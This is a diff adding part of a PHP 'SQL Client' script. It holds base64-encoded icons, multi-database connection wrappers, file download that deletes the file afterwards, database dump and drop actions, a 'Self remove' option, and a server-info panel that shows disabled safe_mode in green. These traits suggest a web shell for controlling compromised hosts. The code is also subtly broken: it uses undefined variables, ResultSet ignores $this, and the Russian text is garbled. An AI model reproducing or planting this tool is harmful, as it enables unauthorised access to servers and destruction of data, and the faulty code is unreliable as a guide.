+AwABxMDNhQK4AQIIKMDAxsDFAgVs3AABBBRgY2TngHI5uLgBAgikhY2dnQOkHMjn4gYIIKAAJycn
+GzsHkABiLm6AAAIJMHMCFXEA+UAGN0AAQVRwQdSAVAAEEEIFO0QFQAAhmcEONgMggMACID4zM0iE
+ixsggEACrExsnGDADhQACCCgACsjWAEzSA0XN0AAgQSAzuKEAi5ugAACuZQD4Td2boAAYkD3PkCA
+AQCA0wiXuX9engAAAABJRU5ErkJggg==
+",
+"drop"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAYUExURZlmZv+ZM/9mAMwzM8wAAP8AAJkA
+AAAAAJHQzOoAAAAIdFJOU/////////8A3oO9WQAAAJFJREFUeNpiYEcDAAHEwM7AwgDnsbCzAwQQ
+AzsLIysblAuiAQIIKMvCChEB89kBAgisnAUkAuGzAwQQRD9QBMpnBwggqIEsMHPYAQIIrgImAhBA
+CDOgIgABxIBQDyEBAggowMzEAlHNCiIAAoiBnRnuMLAIQAABBeB8MAAIIKAWJD5QCUAAMaD7FiCA
+MAQAAgwAYLoGdQu5RxIAAAAASUVORK5CYII=
+",
+"tbl"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURZmZzAAAAP///wAAAPTjxFQAAAAE
+dFJOU////wBAKqn0AAAAZklEQVR42mJgRgMAAcSALgAQQEABBiTAzAwQQBgCAAEERIxMcMDIzAwQ
+QGABRjhiZgYIIAwVAAGEoQIggDBUAAQQhgqAAMJQARBAGCoAAghDBUAAgQSQADMzQABheA4ggDAE
+AAIMAAxGAgtuLhqmAAAAAElFTkSuQmCC
+",
+"db"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAPUExURZmZmZmZzAAAAP///wAAACr8yT8A
+AAAFdFJOU/////8A+7YOUwAAAINJREFUeNpiYEEDAAHEAMSMMAASAAggDAGAAAIJMDFDABNIACCA
+IAIMCEUAAQRVgRAACCCoCoQugABigBjJxMwEQSwAAQQXgKkACCAGiB0IFQABBBIAMeAqAAIIpgIG
+WAACCKqCgQHiLBYWgABiQHUnCwtAAAEF4KrBACCAGNC9DxBgAG1fAsX0YasPAAAAAElFTkSuQmCC
+",
+"index"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAYUExURYCAgP//mZmZzP/MMwAAAP///2Zm
+ZgAAAIJePFIAAAAIdFJOU/////////8A3oO9WQAAAJVJREFUeNpiYEcDAAHEwM6GAtgBAggowMTE
+BMJMDKyMzCzsAAGEEADzWdgBAgiuBcJnYwcIIKAAKysrEDOA+Kxs7AABBBIA0qwMrCA+UAAggKAq
+gHwQAJoBEEBQFSxAwAo2AyCAEGawQswACCAMMwACCK4CzAcKAAQQTAWEDxQACCCYCggfKAAQQBie
+AwggBnTvAwQYAKRBBR9UXrlRAAAAAElFTkSuQmCC
+",
+"primary"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAABLUExURfnHAOq7APXEAPTDAPrIAO6+APzK
+APPCAOy9AP7LAPHBAP3KAOa4APjGAO+/APDAAPfGAPvJAPLCAOi6AJmZzAAAAP///2ZmZgAAAMjq
+96cAAAAZdFJOU////////////////////////////////wABNAq3AAAAtklEQVR42mKQQAMAAcQg
+IQ4BoiAgLi4BEEBAAREREXERUR5GfiYWUXEJgACCCogKM7KKMnByikoABBBUiygHKzMzMxuDqARA
+AAEFxMTExMVEBbmZ+BiBWgACCCQgChQQE2Vh5wAyJAACCKYCKMIlCmRIAAQQTIWoKIMQWAAggJBU
+sIMFAAIIoYKFCSwAEEBIKgTAAgABhFDBxgsWAAggJBUMYAGAAIJ7DuhaECEBEEAM6N4HCDAAhuMU
+XdCwN9oAAAAASUVORK5CYII=
+",
+"empty"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAVUExURczMzJmZzJmZmf///2ZmZgAAAAAA
+AICwWGkAAAAHdFJOU////////wAaSwNGAAAAiElEQVR42mJgQwMAAcTAxoIC2AACCCjAyMgIwmDA
+wgYQQHABVlZWsABAAEG0sMIACxtAAAEFmJlZmZiYGBgYgCQrG0AAQQQQgA0ggMACzCysTKwMQMzM
+wgYQQBgCAAGEIQAQQBgCAAGEIQAQQBgCAAGEEGCGCAAEENRzMIeysAEEEAO69wECDAAaSAQP5Fbp
+rQAAAABJRU5ErkJggg==
+",
+"edit"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0
+U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAPUExURZmZzMzMzP///wAAAAAAAJ7/OwsAA
+AAFdFJOU/////8A+7YOUwAAAIxJREFUeNpiYEEDAAHEAGMwgwALAwtAAMEEmBlBgJmBBSCAGGB8iA
+gDC0AAMUDUMkJFGFgAAggowMQE4TODtQAEEEgAyIaIgQwFCCCwAFARRBRoGkAAgbWAAUgrUAAggBA
+CTBABgACCagFbBRYACCAMFQABhKECIIAwVAAEENSlUAAUAAggBnTvAwQYAIWRAuW2b0fYAAAA
+AElFTkSuQmCC
+",
+"reload"=>
+"R0lGODlhFgAWANU/AFq69hZZuIXS9mTF+5Ph/Fym5GWx6ILb/Zzo/ond/jZosqXu/iNryn3W/ApSu
+2nC83TO+yxpsUuX3oXX+mq87Vay7lF/rGK57HXW/jqD1RRcxEh2tGG986Dr/qLs/nHS/hphxYHO9CF
+euJfm/mfI+3/N9G7P/ofW92nK/m7J+mm06Td0sG7O+y540Y7g/YDZ/G/Q/EBtr4jX+HTR+3HE8HXF8
+WC/9wZPvCpzzmvM/XXU+oHR9l/B/R9pywBMvf///yH5BAEAAD8ALAAAAAAWABYAAAb/wJ9wKNyIfD2
+fKEYUOpq/DaNQclknhkxgCNI0RRLZ7sGxDSCNUaglAu16REWYUqkDADweKjEqCDpwQwwnNBcXHBwAN
+jwDAygNCCOAQyIGYgYGKhMEDSkDJCg5DTMegT8MNS0OAQE+DjgGBAkpOSwwpIEbGRoRKxFbQgoMJSM
+ztzoLgSIOGxYWCk09AiMNDS8HyUI3G0IWTSAhCAgdHgvmplBCrT7s7ewODu7ywOlCPeYLHh0dCCEg9
+T9u2Ftw4MCLFwgEoIsy5IaIgRgwfIAUggE0ISJW/FihIQOTH/cifoABwwUBFTgc3GDloEUNBkNCHvh
+gIgcJCJtkUMC0Q4YBUHo9PIw7YAIFiQE2ODx4QOECjRMwY3o4UQCBCxNHk16oQ0GGhAhEpIEQ0UIAg
+gMQUiyl0VMCPSEa/qnLoEIGgbslCjD4SORJEwWtkgTg2yQI
+ADs=
+",
+"back"=>
+"R0lGODlhFgAWANU/AGXoXGvrYSKUIRWVFQuSC5T3eyzMKNr8yHPra1zUT4nzdHzuclrnVW3MYnLtZ
+ReqFnvwarr8qlfSTUKYQjGoLJP0gY30eVPMSKj4l0vHRMT9tHfuakO3PITzcVzfVE/lSmvdXWbcWFu
+eW2DUV1O5S4Xxec/9vVnOUGHWUuT/0r38sMjytnLgYrH4m676o7Puo2maab/3rZ75hIDvbo3VgY/xg
+4DybqzonKX5jUfgP5D4g5rzg5rzjbP5oQCQAP///yH5BAEAAD8ALAAAAAAWABYAAAbuwJ9wSBSKisj
+kTyQgKJ+/CWXlgyYFpEOqaiUSGqnYgdv9EWiHlmVc/g1uB1xBYfLZ7/aBYCh9mWQFFnQahCqGEYhOP
+wIcMSoFkAodFRYlCwsImQsuVQMkGhiQgh02EA4BAAAMHx8AGD4DDRE7FoKSpaeoDB4SGSM8sA09FZI
+dMxCmpwAeCRcXGSc1nRwYFccQG7khKAkSz9AlXAIUNTrZyiwgICEjIxInIwtkPw8IOg4A2xYzlwsb2
+QgCKBpCwEMHENw24MFDYE8RAgYchJAQYF4XAg8CeGBgsc
+uABzk+dOwywYeBkSTttEECY8CTIAA7
+",
+'home'=>
+"R0lGODlhGAAYALMJAN3d3WZmZurq6vz5ALKysoaGhgQEBMzMzP///////wAAAAAAAAAAAAAAAAAAA
+AAAACH5BAEAAAkALAAAAAAYABgAAAR8MMlJq704a1pmKcZWFUOYFIApngNBhKi6kW9rxCtt1G8q6gQ
+EzyC7ABHIoeaITBpsGGbTCR3ZgtOpkkLcZb8voqWA/WZfRrP5UJQUsp+PYcpOT98CNr19gudfe3ZNB
+QcEIIFjcIYBc011Ywe
+RkR8BjJKRfF2am5srnp8aEQA7
+",
+"save"=>
+"R0lGODlhEAAQAKIEAFVVVez1AP///yYmJv///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM/S
+LrcCjBK+cIQOOM76tXZIHpgaJGlMJwEYKUq637l2rWBJe5ifru5oNBX0fF2Mt9xkzTumD8lD7o4Wke
+O7CIBADs=
+",
+"clear"=>
+"R0lGODlhEAAQANU/ACY7SUZnh4ieyZ6yuN/m8Ka611qWsr3W477Z5JzJ1md+usXO4e7w9t3k797i7
+2V+s2Foa5iqxKy/xl2it4+owaq52Ji704mjyo+gzNrf7dnk7jFUXrS/3B0zOebp80l6iWeWunqNvYa
+myqPA15mjpVaPq1WRqIePkYSVn5GUlLG6vqartXiownq6ykZbgpGfxJrB1Pb3946gy42lzNPa6k6Jn
+EiAkHyVoz1RccnS5rC72Ft7qw8ZHpq10wAAAP///yH5BAEAAD8ALAAAAAAQABAAAAZpwJ9wSCwaj8j
+kcSFz4XwBkCpm1GE4vt3FNyqdjIqMI+cRASwHgPEVqtA8DA2sBjk+AAEfz7fpIAURKz4oPh8+fwUNB
+gc+CYdHMwUEBgiNj0YUPZMINi2XRjcsJhMbPilKEgMD
+JEqtrkVBADs=
+",
+"insert"=>
+"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U
+29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAPUExURf/MMzMzM8zMzGZmzAAAANwpnsUAAAA
+FdFJOU/////8A+7YOUwAAAIFJREFUeNpiYEEDAAHEwMIIBhAeMwsLQAAxsDCBAESAmZmZBSCAoAJMc
+BUAAQQVYIabARBAYDOYmBECAAHEANMLBGDDAQKIAcIHARZGBgYGFoAAYoDzoQIAAYShAiCAMMwACCA
+MWwACCMMdAAGE6lIgAAggFL+AAEAAofoWCAACDACoswMV4KhprQAAAABJRU5ErkJggg==
+",
+"download"=>
+"R0lGODlhEAAQALMAAAAAAP///wD/AAC/ACAZAZCJcf/GCvetCcDAwICAgP///wAAAAAAAAAAAAAAAA
+AAACH5BAEAAAoALAAAAAAQABAAAARIUMmpziE002Ow1pz3bd04WSEBmJXhimY4JjRdEEVNSwni/0BfA
+pAIGI9II40YDA4Ey15TKhz2dNirFZFMIqLZ8EoBKJvPZkkEADs=
+",
+"announse"=>
+"R0lGODlhEwASAMQfAP/GjAhgjPT4+v6qVbqegv7r1/+dOq3H0v3Sp1RxcAICAo22zNWzjFmTr9XDq9a
+PQmuhvN/r8ayGUO7XvkyIo4p/aH9hQ3eSlP+3b/7fv3+pu0o0Hy54nMHY42KZs////yH5BAEAAB8ALAA
+AAAATABIAAAWe4CeO4tEsZJp2TXN41KGmkVvcRyDPIqTdwFyEB2ncJg6gBjI7cDKZiUJRgWYoqBTHYd0
+oCFZHYDhaUBBogtqBRl80I0GAjbZMLW10QCBaXACAAAh3gYAXWRwMhQCEhQwcH3IYk5R3lJR7EQEDnJ1
+3nZ0cEXKgA14KGw+lex8aCQawsbKxFUw9CRIPD7O6EgkQZCUUHBwBxsbELjzLKSEAOw==
+",
+);
+
+if (!function_exists("create_image")) {
+ function create_image( $value = false ) {
+  global $images_array;
+  return base64_decode($images_array[$value]);
+ }
+}
+
+// Images
+if (isset($_GET["image"])) {
+ @ob_clean();
+ header("Content-type: image/gif");
+ header("Cache-control: public");
+ header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+ header("Cache-control: max-age=".(60*60*24*7));
+ header("Last-Modified: ".date("r",filemtime(__FILE__)));
+ echo create_image($_GET["image"]);
+ exit();
+}
+
+/*
+ * Download file
+ */
+if (!function_exists("downloadfile")) {
+ function downloadfile( $file ) {
+  @ob_clean();
+  $filetype = 'application/download';
+  header("Pragma: public");
+  header("Expires: 0");
+  header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
+  header("Cache-Control: private",false);
+  header("Content-Type: ".$filetype);
+  header("Content-Disposition: attachment; filename=\"".basename($file)."\";");
+  header("Content-Transfer-Encoding: binary");
+  header("Content-Length: ".@filesize($file));
+  set_time_limit(0);
+  $buffer = ''; 
+  $handle = @fopen($file, 'rb'); 
+  if ($handle === false) { 
+   return false; 
+  } 
+  while (!feof($handle)) { 
+   $buffer .= fread($handle, 1024); 
+  }
+  @fclose($fp);
+  echo $buffer; 
+  unlink($file);
+  exit;
+ } 
+}
+
+/*
+ * AddInput
+ */
+if (!function_exists("new_input")) {
+ function new_input($type,$name,$size,$value) {
+  $str = "<input type=\"".$type."\" name=\"".$name."\" ";
+  if($size != 0) {
+   $ret .= "size=\"".$size."\" ";
+  }
+  $str .= "value=\"".$value."\">";
+  return $str;
+ }
+}
+
+// Language array
+$lang = array(
+ // Russian
+ 'ru_text1' => '��������� ����',
+ 'ru_text2' => '������',
+ 'ru_text3' => '������ �������',
+ 'ru_text4' => '���������� �������',
+ 'ru_text5' => '�������� �������',
+ 'ru_text6' => '������ ��',
+ 'ru_text7' => '��',
+ 'ru_text8' => 'Actions',
+ 'ru_text9' => '������� ��',
+ 'ru_text10' => '����� ��',
+ 'ru_text11' => '��������',
+ 'ru_text12' => '��������� ��',
+ 'ru_text13' => '������� ��',
+ 'ru_text14' => '�������',
+ 'ru_text15' => '������� �������',
+ 'ru_text16' => '���������',
+ 'ru_text17' => '��������',
+ 'ru_text18' => '��������',
+ 'ru_text19' => '�������������',
+ 'ru_text20' => '�������',
+ 'ru_text21' => '��������� �������',
+ 'ru_text22' => '��������� �������',
+ 'ru_text23' => '��������� � ����������',
+ 'ru_text24' => '���������',
+ 'ru_text25' => '����������',
+ 'ru_text26' => '�������',
+ 'ru_text27' => '��������!!! ���� �� ���������� ��� ��� ���� ��� ������',
+ 'ru_text28' => '��������!!! ���� ������ ��� ������ ������',
+ 'ru_text29' => '���������� SQL �������',
+ 'ru_text30' => '������� ������',
+ 'ru_text31' => '������� ��� ������������ SQL �������� '.$version,
+ // English  
+ 'en_text1' => 'Load File',
+ 'en_text2' => 'Query',
+ 'en_text3' => 'Server status',
+ 'en_text4' => 'Server variables',
+ 'en_text5' => 'Process list',
+ 'en_text6' => 'DB List',
+ 'en_text7' => 'DB',
+ 'en_text8' => 'Actions',
+ 'en_text9' => 'Create DB',
+ 'en_text10' => 'Total DB',
+ 'en_text11' => 'Load',
+ 'en_text12' => 'Dump DB',
+ 'en_text13' => 'Drop DB',
+ 'en_text14' => 'Table',
+ 'en_text15' => 'Create Table',
+ 'en_text16' => 'Desc',
+ 'en_text17' => 'Show',
+ 'en_text18' => 'Insert',
+ 'en_text19' => 'Edit',
+ 'en_text20' => 'Delete',
+ 'en_text21' => 'Dump Table',
+ 'en_text22' => 'Table Desc',
+ 'en_text23' => 'Desc and data info',
+ 'en_text24' => 'Desc info',
+ 'en_text25' => 'Data info',
+ 'en_text26' => 'Download',
+ 'en_text27' => 'Warning!!! File not exists or not readable',
+ 'en_text28' => 'Warning!!! File is empty or some error',
+ 'en_text29' => 'Server Information',
+ 'en_text30' => 'Self remove',
+ 'en_text31' => 'Thanks for using SQL Client '.$version,
+);
+
+class ResultSet {
+ var $result;
+ var $total_rows;
+ var $fetched_rows;
+
+ function set_result( $res ) {
+  $result = $res;
+ }
+
+ function get_result() {
+  return $result;
+ }
+
+ function set_total_rows( $rows ) {
+  $total_rows = $rows;
+ }
+
+ function get_total_rows() {
+  return $total_rows;
+ }
+
+ function set_fetched_rows( $rows ) {
+  $fetched_rows = $rows;
+ }
+
+ function get_fetched_rows() {
+  return $fetched_rows;
+ }
+
+ function increment_fetched_rows() {
+  $fetched_rows = $fetched_rows + 1;
+ }
+}
+
+if (!function_exists("sql_error")) {
+ function sql_error() {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    return mysql_error();
+   break;;
+   case "mSQL":
+    return msql_error($host);
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_connect")) {
+ function sql_connect($host, $user, $password, $db) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $dbi=@mysql_connect($host, $user, $password);
+    @mysql_select_db($db);
+    return $dbi;
+   break;;
+   case "mSQL":
+    $dbi=msql_connect($host);
+    msql_select_db($db);
+    return $dbi;
+   break;;
+   case "postgres":
+    $dbi=@pg_connect("host=$host user=$user password=$password port=5432 dbname=$db");
+    return $dbi;
+   break;;
+   case "postgres_local":
+    $dbi=@pg_connect("user=$user password=$password dbname=$db");
+    return $dbi;
+   break;;
+   case "ODBC":
+    $dbi=@odbc_connect($db,$user,$password);
+    return $dbi;
+   break;;
+   case "ODBC_Adabas":
+    $dbi=@odbc_connect($host.":".$db,$user,$password);
+    return $dbi;
+   break;;
+   case "Interbase":
+    $dbi=@ibase_connect($host.":".$db,$user,$password);
+    return $dbi;
+   break;;
+   case "Sybase":
+    $dbi=@sybase_connect($host, $user, $password);
+    sybase_select_db($db,$dbi);
+    return $dbi;
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_list_processes")) {
+ function sql_list_processes($id) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    return @mysql_list_processes($id);
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_field_name")) {
+ function sql_field_name($res,$count) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    return mysql_field_name($res,$count);
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_logout")) {
+ function sql_logout($id) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $dbi=@mysql_close($id);
+    return $dbi;
+   break;;
+   case "mSQL":
+    $dbi=@msql_close($id);
+    return $dbi;
+   break;;
+   case "postgres":
+   case "postgres_local":
+    $dbi=@pg_close($id);
+    return $dbi;
+   break;;
+   case "ODBC":
+   case "ODBC_Adabas":
+    $dbi=@odbc_close($id);
+    return $dbi;
+   break;;
+   case "Interbase":
+    $dbi=@ibase_close($id);
+    return $dbi;
+   break;;
+   case "Sybase":
+    $dbi=@sybase_close($id);
+    return $dbi;
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+if (!function_exists("get_server_info")) {
+ function get_server_info() {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    return "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info().")";
+   break;;
+   default:
+    return "unknown";
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_num_fields")) {
+ function sql_num_fields($res) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    return mysql_num_fields($res);
+   break;;
+   case "mSQL":
+    return msql_num_fields($res);
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_affected_rows")) {
+ function sql_affected_rows() {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    return mysql_affected_rows();
+   break;;
+   case "mSQL":
+    return msql_affected_rows();
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+/*
+ * sql_query($query, $id)
+ * executes an SQL statement, returns a result identifier
+ */
+if (!function_exists("sql_query")) {
+ function sql_query($query, $id) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $res=mysql_query($query, $id);
+    return $res;
+   break;;
+   case "mSQL":
+    $res=@msql_query($query, $id);
+    return $res;
+   break;;
+   case "postgres":
+   case "postgres_local":
+    $res=pg_exec($id,$query);
+    $result_set = new ResultSet;
+    $result_set->set_result( $res );
+    $result_set->set_total_rows( sql_num_rows( $result_set ) );
+    $result_set->set_fetched_rows( 0 );
+    return $result_set;
+   break;;
+   case "ODBC":
+   case "ODBC_Adabas":
+    $res=@odbc_exec($id,$query);
+    return $res;
+   break;;
+   case "Interbase":
+    $res=@ibase_query($id,$query);
+    return $res;
+   break;;
+   case "Sybase":
+    $res=@sybase_query($query, $id);
+    return $res;
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+/*
+ * sql_num_rows($res)
+ * given a result identifier, returns the number of affected rows
+ */
+if (!function_exists("sql_num_rows")) {
+ function sql_num_rows($res) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $rows=mysql_num_rows($res);
+    return $rows;
+   break;;
+   case "mSQL":
+    $rows=msql_num_rows($res);
+    return $rows;
+   break;;
+   case "postgres":
+   case "postgres_local":
+    $rows=pg_numrows( $res->get_result() );
+    return $rows;
+   break;;
+   case "ODBC":
+   case "ODBC_Adabas":
+    $rows=odbc_num_rows($res);
+    return $rows;
+   break;;
+   case "Interbase":
+    echo "<BR>Error! PHP dosen't support ibase_numrows!<BR>";
+    return false;
+   break;;
+   case "Sybase":
+    $rows=sybase_num_rows($res);
+    return $rows;
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+/*
+ * sql_fetch_row(&$res,$row)
+ * given a result identifier, returns an array with the resulting row
+ * Needs also a row number for compatibility with postgres
+ */
+if (!function_exists("sql_fetch_row")) {
+ function sql_fetch_row(&$res, $nr=0) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $row = mysql_fetch_row($res);
+    return $row;
+   break;;
+   case "mSQL":
+    $row = msql_fetch_row($res);
+    return $row;
+   break;;
+   case "postgres":
+   case "postgres_local":
+    if ( $res->get_total_rows() > $res->get_fetched_rows() ) {
+     $row = pg_fetch_row($res->get_result(), $res->get_fetched_rows() );
+     $res->increment_fetched_rows();
+     return $row;
+    } else {
+     return false;
+    }
+   break;;
+   case "ODBC":
+   case "ODBC_Adabas":
+    $row = array();
+    $cols = odbc_fetch_into($res, $nr, $row);
+    return $row;
+   break;;
+   case "Interbase":
+    $row = ibase_fetch_row($res);
+    return $row;
+   break;;
+   case "Sybase":
+    $row = sybase_fetch_row($res);
+    return $row;
+   break;;
+   default:
+   break;;
+  }
+ }
+}
+
+/*
+ * sql_fetch_array($res,$row)
+ * given a result identifier, returns an associative array
+ * with the resulting row using field names as keys.
+ * Needs also a row number for compatibility with postgres.
+ */
+if (!function_exists("sql_fetch_array")) {
+ function sql_fetch_array($res, $nr=0) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $row = array();
+    $row = mysql_fetch_array($res, MYSQL_ASSOC);
+    return $row;
+   break;;
+   case "mSQL":
+    $row = array();
+    $row = msql_fetch_array($res,$nr);
+    return $row;
+   break;;
+   case "postgres":
+   case "postgres_local":
+    if( $res->get_total_rows() > $res->get_fetched_rows() ) {
+     $row = array();
+     $row = pg_fetch_array($res->get_result(), $res->get_fetched_rows() );
+     $res->increment_fetched_rows();
+     return $row;
+    } else {
+     return false;
+    }
+   break;;
+/*
+ * ODBC doesn't have a native _fetch_array(), so we have to
+ * use a trick. Beware: this might cause HUGE loads!
+ */
+   case "ODBC":
+    $row = array();
+    $result = array();
+    $result = odbc_fetch_row($res, $nr);
+    $nf = odbc_num_fields($res); /* Field numbering starts at 1 */
+    for($count=1; $count < $nf+1; $count++) {
+     $field_name = odbc_field_name($res, $count);
+     $field_value = odbc_result($res, $field_name);
+     $row[$field_name] = $field_value;
+    }
+    return $row;
+   break;;
+   case "ODBC_Adabas":
+    $row = array();
+    $result = array();
+    $result = odbc_fetch_row($res, $nr);
+    $nf = count($result)+2; /* Field numbering starts at 1 */
+    for($count=1; $count < $nf; $count++) {
+     $field_name = odbc_field_name($res, $count);
+     $field_value = odbc_result($res, $field_name);
+     $row[$field_name] = $field_value;
+    }
+    return $row;
+   break;;
+   case "Interbase":
+    $orow=ibase_fetch_object($res);
+    $row=get_object_vars($orow);
+    return $row;
+   break;;
+   case "Sybase":
+    $row = sybase_fetch_array($res);
+    return $row;
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_fetch_assoc")) {
+ function sql_fetch_assoc($res) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $row = array();
+    $row = mysql_fetch_assoc($res);
+    return $row;
+   break;;
+   case "mSQL":
+    $row = array();
+    $row = msql_fetch_assoc($res);
+    return $row;
+   break;;
+  }
+ }
+}
+
+if (!function_exists("sql_fetch_object")) {
+ function sql_fetch_object(&$res, $nr=0) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    $row = mysql_fetch_object($res);
+    if($row) return $row;
+    else return false;
+   break;;
+   case "mSQL":
+    $row = msql_fetch_object($res);
+    if($row) {
+     return $row;
+    } else {
+     return false;
+    }
+   break;;
+   case "postgres":
+   case "postgres_local":
+    if( $res->get_total_rows() > $res->get_fetched_rows() ) {
+     $row = pg_fetch_object( $res->get_result(), $res->get_fetched_rows() );
+     $res->increment_fetched_rows();
+     if($row) {
+      return $row;
+     } else {
+      return false;
+     }
+    } else {
+     return false;
+    }
+   break;;
+   case "ODBC":
+    $result = odbc_fetch_row($res, $nr);
+    if(!$result) return false;
+    $nf = odbc_num_fields($res); /* Field numbering starts at 1 */
+    for($count=1; $count < $nf+1; $count++) {
+     $field_name = odbc_field_name($res, $count);
+     $field_value = odbc_result($res, $field_name);
+     $row->$field_name = $field_value;
+    }
+    return $row;
+   break;;
+   case "ODBC_Adabas":
+    $result = odbc_fetch_row($res, $nr);
+    if(!$result) return false;
+    $nf = count($result)+2; /* Field numbering starts at 1 */
+    for($count=1; $count < $nf; $count++) {
+     $field_name = odbc_field_name($res, $count);
+     $field_value = odbc_result($res, $field_name);
+     $row->$field_name = $field_value;
+    }
+    return $row;
+   break;;
+   case "Interbase":
+    $orow = ibase_fetch_object($res);
+    if($orow) {
+     $arow=get_object_vars($orow);
+     while(list($name,$key)=each($arow)) {
+      $name=strtolower($name);
+      $row->$name=$key;
+    }
+     return $row;
+    } else return false;
+   break;;
+   case "Sybase":
+    $row = sybase_fetch_object($res);
+    return $row;
+   break;;
+  }
+ }
+}
+
+/*
+ * Function Free Result for function free the memory
+ */
+if (!function_exists("sql_free_result")) {
+ function sql_free_result($res) {
+  global $dbtype;
+  switch ($dbtype) {
+   case "mysql":
+    return mysql_free_result($res);
+   break;;
+   case "mSQL":
+    return msql_free_result($res);
+   break;;
+   case "postgres":
+   case "postgres_local":
+    return pg_FreeResult( $res->get_result() );
+   break;;
+   case "ODBC":
+   case "ODBC_Adabas":
+    return odbc_free_result($res);
+   break;;
+   case "Interbase":
+    echo( "<BR>Error! PHP dosen't support ibase_free_result!<BR>" );
+   break;;
+   case "Sybase":
+    return sybase_free_result($res);
+   break;;
+  }
+ }
+}
+
+/*
+ * Function Format Size
+ */
+if (!function_exists("formatsize")) {
+ function formatsize( $value = false ){
+  if($value >= 1073741824) {
+   $value = round($value / 1073741824 * 100) / 100 . "Gb";
+  } elseif($value >= 1048576) {
+   $value = round($value / 1048576 * 100) / 100 . "Mb";
+  } elseif($value >= 1024) {
+   $value = round($value / 1024 * 100) / 100 . "Kb";
+  } else {
+   $value = $value . "b";
+  }
+  return $value;
+ }
+}
+
+/*
+ * Return Alphanumerical chars
+ */
+if (!function_exists("AlphanumericalClean")) {
+ function AlphanumericalClean( $str = false ) {
+  return preg_replace( "/[^�-��-�a-zA-Z0-9\-\_\ ]/", "" , $str );
+ }
+}
+
+/*
+ * Get server info
+ */
+if (!function_exists("server_info")) {
+ function server_info() {
+  global $tmpdir,$baseurl;
+  if (empty($tmpdir)) {
+   $tmpdir = ini_get("upload_tmp_dir");
+   if (is_dir($tmpdir)) {$tmpdir = realpath("./");}
+  }
+  $tmpdir = @realpath($tmpdir);
+  // Safe mod checking
+  if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
+   $safemode = "<font color=\"red\">ON (secure)</font>";
+  } else {
+   $safemode = "<font color=\"green\">OFF (not secure)</font>";
+  }
+  // Open Base dir
+  if (@ini_get("open_basedir") or strtolower(@ini_get("open_basedir")) == "on")  {
+
+   $openbasedir = "<font color=\"red\">ON (secure)</font>";
+  } else {
+   $openbasedir = "<font color=\"green\">OFF (not secure)</font>";
+  }
+  // Return information about server in array
+  return array
+         (
+          "OS"              => wordwrap(php_uname(),90,"<BR>",1),
+          "TMP_DIR"         => $tmpdir,
+          "UID"             => getmyuid(),
+          "GID"             => getmygid(),
+          "Process PID"     => getmypid(),
+          "Server Software" => $_SERVER["SERVER_SOFTWARE"],
+          "PHP version"     => "<a href=\"".$baseurl."&act=14\">".phpversion()."</a>",
+          "SafeMod"         => $safemode,
+          "Open Base Dir"   => $openbasedir,
+          "SQL version"     => get_server_info(),
+          "Server name"     => $_SERVER["SERVER_NAME"],
